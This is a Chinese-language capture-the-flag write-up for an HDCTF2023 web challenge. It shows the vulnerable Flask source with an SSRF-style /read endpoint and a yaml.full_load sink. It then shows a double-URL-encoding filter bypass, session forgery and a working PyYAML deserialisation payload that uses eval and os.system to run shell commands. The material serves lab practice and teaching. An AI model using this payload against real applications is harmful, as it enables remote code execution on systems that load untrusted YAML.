今天做了到新颖的题,关于python中的yaml反序列化的题目,直接上题吧。
发现第一个链接的参数是?url=XXXX,一眼利用点。
嗯?直接出了flag,应该是非预期解。再看看有app.py,那就试试。发现app.*被过滤了,二次编码绕过试试。
点击查看代码
@app.route('/')
def index():session['passport'] = 'YamiYami'return '''Welcome to HDCTF2023 <a href="/read?url=https://baidu.com">Read somethings</a><br>Here is the challenge <a href="/upload">Upload file</a><br>Enjoy it <a href="/pwd">pwd</a>'''
@app.route('/pwd')
def pwd():return str(pwdpath)
@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('app.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m:return "re.findall('app.*', url, re.IGNORECASE)"if n:return "re.findall('flag', url, re.IGNORECASE)"res = urlopen(url)return res.read()except Exception as ex:print(str(ex))return 'no response'def allowed_file(filename):for blackstr in BLACK_LIST:if blackstr in filename:return Falsereturn True
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():if request.method == 'POST':if 'file' not in request.files:flash('No file part')return redirect(request.url)file = request.files['file']if file.filename == '':return "Empty file"if file and allowed_file(file.filename):filename = secure_filename(file.filename)if not os.path.exists('./uploads/'):os.makedirs('./uploads/')file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))return "upload successfully!"return render_template("index.html")
@app.route('/boogipop')
def load():if session.get("passport")=="Welcome To HDCTF2023":LoadedFile=request.args.get("file")if not os.path.exists(LoadedFile):return "file not exists"with open(LoadedFile) as f:yaml.full_load(f)f.close()return "van you see"else:return "No Auth bro"
if __name__=='__main__':pwdpath = os.popen("pwd").read()app.run(debug=False,host="0.0.0.0")print(app.config['SECRET_KEY'])
得到session了,那就开始上传文件,yaml详细解释看 https://www.cnblogs.com/icfh/p/17760855.html
点击查看代码
payload: 我发现很多题只有在tmp下有权限???本人比较穷,所以尽可能以后做题不nc!!python/object/new:strargs: []state: !!python/tuple- "__import__('os').system('cat /tmp/flag_13_114514 > /tmp/1.txt')" - !!python/object/new:staticmethodargs: []state:update: !!python/name:evalitems: !!python/name:list
上传后访问boogipop?file=uploads/1.txt
成功,利用read页面查看/tmp/1.txt
总结:
- url二次编码绕过
- uuid相关session伪造
- yaml.full_load() 触发yaml反序列化